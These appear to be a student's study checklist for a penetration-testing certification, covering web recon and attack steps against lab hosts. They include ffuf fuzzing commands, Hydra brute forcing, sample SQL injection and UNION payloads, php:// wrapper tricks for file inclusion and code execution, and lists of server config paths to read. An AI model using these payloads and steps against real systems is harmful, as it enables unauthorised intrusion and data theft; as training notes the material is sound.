# Passive Recon
### 1. Review public DNS DNS records for domain and associated subdomains
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/2 - DNS Overview|DNS Overview]]
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/3 - Digging DNS|Digging DNS]]
### 2. Review certificates and other info for domain and associated subdomains
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/5 - Certificate Transparency Logs|Certificate Transparency Logs]]
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/8 - Search Engine Discovery|Search Engine Discovery]]
- [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/9 - Web Archives|Web Archives]]
### 3. Automated Passive Scans
> [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/10 - Recon Automation|Recon Automation]]
- Run `FinalRecon`
- Run `Recon-ng`
- Run `theHarvester`
---
# Active Recon
### 1. Add domain and associated subdomains to `/etc/hosts` for proper name resolution
### 2. Try `index.html` and `index.php` to review common extensions
### 3. Web fuzzing
- First, perform directory fuzzing
- Use `raft-medium-directories.txt` with 30K entries, then `directory-list-2.3-medium.txt` with 220K entries
- If we see a lot of dirs use `feroxbuster` for recursion
- Second, perform extension fuzzing after a directory is found
- Third, if extension found, fuzz for pages with extension appended
- Fourth, perform subdomain/vhost fuzzing
```bash
# dir fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://<target_FQDN/IP>:<port>/FUZZ -c -ic #30K entries
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target_FQDN/IP>:<port>/FUZZ -c -ic #220K entries
# follow-up recursive dir fuzzing with feroxbuster
feroxbuster -u http://<target_FQDN/IP>:<port> #uses raft-medium be default
feroxbuster -u https://<target_FQDN/IP>:<port> -k -x php #use -k for https and -x to specify extension
# extension fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u http://<target_FQDN/IP>:<port>/directory/<page>FUZZ -c -ic
# page fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://<target_FQDN/IP>:<port>/directory/FUZZ.php -c -ic
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target_FQDN/IP>:<port>/directory/FUZZ.php -c -ic
# parameter fuzzinfg
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://<target_FQDN/IP>:<port>/directory?FUZZ= -c -ic
#DNS fuzzing (good for AD recon)
gobuster dns -d http://<target_FQDN/IP>:<port> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# subdomain fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.inlanefreight.htb -c -ic
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://FUZZ.inlanefreight.htb -c -ic
# vhost fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://academy.htb/ -H 'Host: FUZZ.academy.htb' -c -ic
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://academy.htb/ -H 'Host: FUZZ.academy.htb' -c -ic
```
### 4. Review `robots.txt` and `sitemap.xml`
### 5. Crawl webserver for all links
> [[5 - CPTS/3 - CPTS Notes/9 - Info Gathering (web)/7 - Crawling, robots.txt, .well-known URIs|Crawling]]
- Use `scrapy` or `reconspider.py`
### 6. Review page source of all discovered pages for sensitive info and potential usernames
### 7. Try random page to capture server errors for potential tech stack indications
### 8. Attempt to fingerprint webserver tech stack
- Use `whatweb` command line tool to discover webserver tech stack
- Scan webserver with `nikto` to discover webserver tech stack and potential vulns
- Use `wappalyzer` browser extension to discover webserver tech stack
- Use `wafw00f` to discover WAF
### 9. Perform web app enum
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/2 - Application Discovery & Enum|General Web Application Discovery & Enum]]
- Run `eyewitness` or `aquatone`
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/3 - WordPress - Discovery & Enum|WordPress]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/5 - Joomla - Discovery & Enum| Joomla]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/7 - Drupal - Discovery & Enum|Drupal]]
- [[5 - CPTS/4 - Skills Assessments/Linux Privsec/2 - Tomcat Enum|Tomcat]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/11 - Jenkins - Discovery & Enum|Jenkins]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/13 - Splunk - Discovery & Enum|Splunk]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/15 - PRTG Network Monitor|PRTG Network Monitor]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/16 - osTicket|osTicket]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/17 - Gitlab - Discovery & Enum|Gitlab]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/19 - Attacking Tomcat CGI|Tomcat CGI]] & [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/20 - Attacking CGI Apps|CGI Apps]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/25 - IIS Tilde Enum|IIS Tilde]]
- [[5 - CPTS/3 - CPTS Notes/22 - Attacking Common Web Apps/23 - ColdFusion - Discovery & Enum|ColdFusion]]
### 10. Check for vulns in webserver tech stack and web apps versions
- Use both `searchsploit` AND Google
- Document discovered vulns
### 11. Look for login pages to test with default or weak creds
- Try **DEFAULT or COMMON** creds before attempting to brute force
- [[5 - CPTS/2 - Checklists/1 - External Enum/3 - Default Creds Attack Sequence|Default Creds]]
- [[5 - CPTS/3 - CPTS Notes/14 - Login Brute Forcing/6 - Hydra - Basic HTTP Auth|Hydra - Basic HTTP Auth]]
- [[5 - CPTS/3 - CPTS Notes/14 - Login Brute Forcing/7 - Hydra - Login & Security Forms|Hydra - Login & Security Forms]]
- When brute forcing, start with small lister before using `/opt/rockyou.txt`
- Notes:
- Check for password reset or recovery mechanisms
- Review cookies and sessions
- Test for session fixation or missing CRSF protections
### 12. Identify input fields to submit data
> [[5 - CPTS/3 - CPTS Notes/12 - Web Proxies/2 - Intercepting Requests|Intercepting Requests]]
- Intercept request with `burp` and review responses
### 13. Test submitting data to EVERY input field
- Does input appear to be used by a system command like `ping` -> Think: **Command Injection**
- Does a file upload mechanism exist? -> Think: **File Upload Attacks**
- Does the webserver appear to be populating data from a db (e.g., username and password fields)? -> Think: **SQLi**
- Test simple injection: `' OR 1=1 --`
- Test UNION injection `' UNION SELECT NULL,NULL--`
```bash
#Example SQLi payloads for username field
admin'
admin'-- -
admin' OR 1=1
admin' OR 1=1-- -
#Example UNION payloads
test' UNION SELECT 1,2;-- -
test' UNION SELECT 1,2,2,3,4,5,6;-- -
test' UNION SELECT 1,@@version,2,3,4,5,6;-- - #once we determine the number of columns, determine the injectable column
```
- Do GET parameters appear to be pulling local files on webserver? -> Think: **Path Traversal and File Inclusion**
- Fuzz GET and POST parameters
- [[5 - CPTS/3 - CPTS Notes/13 - Web Fuzzing with Ffuf/6 - Parameter Fuzzing| Parameter Fuzzing]]
- Try `php://filter` for source code disclosure
- [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/4 - PHP Filters|PHP Filters]]
- Try `php://data` and `php://input` and `php://expect` for RCE
- [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/5 - PHP Wrappers|PHP Wrappers]]
- Try [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/6 - RFI|RFI]]
- Try [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/7 - LFI-enabled File Upload Attacks|LFI-enabled File Upload Attacks]]
- Try [[5 - CPTS/3 - CPTS Notes/18 - File Inclusion/8 - Log Poisoning|Log Poisoning]]
- Is there an API, UID, or other sequence number present in accounts, pages, etc.? -> Think: **IDOR**
- Are XML or SVG or WAV inputs accepted? -> Think: **XXE**
- Is basic HTTP auth or a security message present? --> Think: **Verb Tampering**
- Test all input fields for XSS
### 14. Try to read top-level webserver config file, then individual php files
- This provides lots of context as to how the webserver is running
- May be possible via LFI or SQLi
#### Apache
```bash
/etc/apache2/apache2.conf #default apache config loc
/etc/apache2/sites-available/ #vhost config files
/etc/apache2/sites-available/000-default.conf
/var/www/html/ #default apache webroot for debian distroos
/srv/share/httpd/ #default apache webroot for RHEL
```
#### NGINX
```bash
/etc/nginx/nginx.conf #default nginx config loc
/etc/nginx/sites-available/ #vhost config files
/etc/nginx/sites-enabled/default #vhost config files
/srv/share/nginx/html/ #default nginx webroot for RHEL
/var/www/html #nginx webroot for some installations
```
#### XAMPP & IIS
```powershell
c:\xampp\apache\config\ #default xampp apache config loc
c:\xampp\htdocs\ #default xampp webroot
%windir%\System32\inetsrv\config #default IIS config files
%windir%\System32\inetsrv\config\administration.config #default IIS config file
c:\inetpub\wwwroot #default inet pub webroot
c:\inetpub\wwwroot\web.config
```
### 15. If the webserver uses a web socket or an API, check GET and POST requests for potential SQLi with `sqlmap`